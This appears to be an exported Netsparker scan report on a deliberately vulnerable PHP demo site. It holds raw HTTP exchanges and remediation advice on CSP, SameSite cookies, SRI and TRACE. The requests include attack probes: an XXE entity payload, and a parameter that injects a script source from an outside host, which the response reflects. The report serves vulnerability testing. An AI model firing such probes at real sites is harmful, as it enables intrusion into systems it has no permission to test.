<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header -->
<div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<div class="entry">
<h1 class="title"><a href="/process.php?file=Generics/contact.nsp">Contact </a></h1>
<p>
<iframe width="540" height="350" frameborder="0" scrolling="no" marginheight="0"
style="float: left" marginwidth="0" src="http://maps.google.com/maps?q=mavituna+security&output=embed">
</iframe>
<strong><br />Test&Demonstration Site Ltd
<br />(reg. no. 123456)</strong><br />
<p>
Green House,
3478 Stone QX
Dos Tringulas
EK7 AP0<br />
USA<br />
</p>
<p>
<span>Tel: +44 123 456 7890</span><br />
<span>Fax: +44 123 456 7891</span></p>
<p>
<p>
E-mail: test@testsparker.com</b></a></p>
</p>
…
<iframe sandbox src="framed-page-url"></iframe>
seamless
attribute and allow-top-navigation
, allow-popups
and allow-scripts
in sandbox attribute.WASC | 15 |
Netsparker detected the TRACE/TRACK method is allowed.
Method | Parameter | Value |
---|---|---|
TRACE | URI-BASED |
TRACE / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-NS: N8244718S
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Type: message/http
Transfer-Encoding: chunked
Date: Mon, 13 Jul 2020 07:04:58 GMT
TRACE / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
X-NS: N8244718S
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Host: php.testsparker.com
Accept-Encoding: gzip, deflate
WASC | 14 |
CSP is an added layer of security that helps to mitigate mainly Cross-site Scripting attacks.
CSP can be enabled instructing the browser with a Content-Security-Policy directive in a response header;
Content-Security-Policy: script-src 'self';
or in a meta tag;
<meta http-equiv="Content-Security-Policy" content="script-src 'self';">
In the above example, you can restrict script loading only to the same domain. It will also restrict inline script executions both in the element attributes and the event handlers. There are various directives which you can use by declaring CSP:
When setting the CSP directives, you can also use some CSP keywords:
In addition to CSP keywords, you can also use wildcard or only a scheme when defining whitelist URLs for the points. Wildcard can be used for subdomain and port portions of the URLs:
Content-Security-Policy: script-src https://*.example.com;
Content-Security-Policy: script-src https://example.com:*;
Content-Security-Policy: script-src https:;
It is also possible to set a CSP in Report-Only mode instead of forcing it immediately in the migration period. Thus you can see the violations of the CSP policy in the current state of your web site while migrating to CSP:
Content-Security-Policy-Report-Only: script-src 'self'; report-uri: https://example.com;
There is no direct impact of not implementing CSP on your website. However, if your website is vulnerable to a Cross-site Scripting attack CSP can prevent successful exploitation of that vulnerability. By not implementing CSP you’ll be missing out this extra layer of security.
GET / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 144
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:46 GMT
<html>
<HEAD>
<SCRIPT language="JavaScript">
<!--
window.location="process.php?file=Generics/index.nsp";
//-->
</SCRIPT>
</HEAD>
</html>
Method | Parameter | Value |
---|---|---|
GET | id | 3 |
GET /artist.php?id=3 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3151
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: 3</h3></br>
<table class="container"><thead><th>ID</th><th>Name</th><th>SURNAME</th><th>CREATION DATE </th></thead><tbody><tr class="odd">
<td>3 </td>
<td>ED </td>
<td>CHASE </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
</tbody></table> </p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="get" action="artist.php">
…
GET /function.mysql-connect HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/about.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 404 Not Found
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 13 Jul 2020 07:04:53 GMT
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /function.mysql-connect was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Win32) PHP/5.2.6 Server at php.testsparker.com Port 80</address>
</body></html>
GET /Generics/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 0
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
ETag: "960000000191b3-0-59e4d798bb6f6"
Method | Parameter | Value |
---|---|---|
GET | name | Visitor |
GET /hello.php?name=Visitor HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2993
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h1 class="title"><a href="#">Hello Service </a></h1>
<p>
Hello Visitor<br />
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b><br />
20$str = 20 Visitor;20 </p>
<div style="clear: both;"> </div>
<div class="entry">
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="get" action="artist.php">
<div>
<input type="text" name="id" id="search-text" value="" />
<input type="submit" id="search-submit" value="GO" />
</div>
…
GET /images/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 0
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:54 GMT
ETag: "320000000199c2-0-59e4d798f9c4b"
GET /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3954
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="#">Products </a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<form action="/nslookup.php" method="POST">
<table class="databases">
<tr>
<td colspan="3">
</td>
</tr>
<tr>
<td class="label" style="width: 89px">
<label>IP Adress:</label></td>
<td class="style3">
<input type="text" size="40" name="param" id="param" class="input"/>
</td>
<td class="style1">
<input type="submit" value="GO
…
Method | Parameter | Value |
---|---|---|
POST | param |
POST /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Referer: http://php.testsparker.com/nslookup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
param=
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3954
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:53 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="#">Products </a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<form action="/nslookup.php" method="POST">
<table class="databases">
<tr>
<td colspan="3">
</td>
</tr>
<tr>
<td class="label" style="width: 89px">
<label>IP Adress:</label></td>
<td class="style3">
<input type="text" size="40" name="param" id="param" class="input"/>
</td>
<td class="style1">
<input type="submit" value="GO
…
GET /process.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 1422
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>
POST /process.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 124
Content-Type: application/xml
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 1422
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:05:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>
GET /products.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2809
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<div class="entry">
<h1 class="title"><a href="#">Products </a></h1>
<p>Currently , we don't have any products to sell.</p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="get" action="artist.php">
<div>
<input type="text" name="id" id="search-text" value="" />
<input type="submit" id="search-submit" value="GO" />
</div>
</form>
</div>
<div style="clear: both;"> </div>
</li>
<li>
<h2>Tags</h2>
<p>netsparker xss web-application-security false-positive-fr
…
Content-Security-Policy
in HTTP response headers that instruct the browser to apply the policies you specified.Enable CSP on your website by sending the Content-Security-Policy
in HTTP response headers that instruct the browser to apply the policies you specified.
WASC | 15 |
Cookies are typically sent to third parties in cross origin requests. This can be abused to do CSRF attacks. Recently a new cookie attribute named SameSitewas proposed to disable third-party usage for some cookies, to prevent CSRF attacks.
Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.
GET /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-checkHTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:
…
The server can set a same-site cookie by adding the SameSite=...
attribute to the Set-Cookie
header. There are three possible values for the SameSite
attribute:
Set-Cookie: key=value; SameSite=Lax
Set-Cookie: key=value; SameSite=Strict
SameSite=None
must also specify the Secure
attribute to transfer them via a secure context. Setting a SameSite=None
cookie without the Secure
attribute will be rejected by the browsers.Set-Cookie: key=value; SameSite=None; Secure
WASC | 15 |
Subresource Integrity (SRI) provides a mechanism to check integrity of the resource hosted by third parties like Content Delivery Networks (CDNs) and verifies that the fetched resource has been delivered without unexpected manipulation.
SRI does this using hash comparison mechanism. In this way, hash value declared in HTML elements (for now only script and link elements are supported) will be compared with the hash value of the resource hosted by third party.
Use of SRI is recommended as a best-practice, whenever libraries are loaded from a third-party source.
Method | Parameter | Value |
---|---|---|
GET | pro | hTTp://r87.com/n |
GET /products.php?pro=hTTp%3a%2f%2fr87.com%2fn HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2825
Content-Type: text/html
Date: Mon, 13 Jul 20
…eta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "hTTp://r87.com/n" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href=
…
Using Subresource Integrity is simply to add integrityattribute to the scripttag along with a base64 encoded cryptographic hash value.
<script src="https://code.jquery.com/jquery-2.1.4.min.js" integrity="sha384-R4/ztc4ZlRqWjqIuvf6RX5yb/v90qNGx6fS48N0tRxiGkqveZETq72KgDVJCp2TC" crossorigin="anonymous"></script>
The hash algorithm must be one of sha256, sha384or sha512, followed by a '-' character.
WASC | 15 |
Netsparker detected a missing X-XSS-Protection
header which means that this website could be at risk of a Cross-site Scripting (XSS) attacks.
GET / HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=150
Content-Length: 144
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:46 GMT
<html>
<HEAD>
<SCRIPT language="JavaScript">
<!--
window.location="process.php?file=Generics/index.nsp";
//-->
</SCRIPT>
</HEAD>
</html>
Method | Parameter | Value |
---|---|---|
GET | id | 3 |
GET /artist.php?id=3 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3151
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: 3</h3></br>
<table class="container"><thead><th>ID</th><th>Name</th><th>SURNAME</th><th>CREATION DATE </th></thead><tbody><tr class="odd">
<td>3 </td>
<td>ED </td>
<td>CHASE </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
</tbody></table> </p>
</div>
</div>
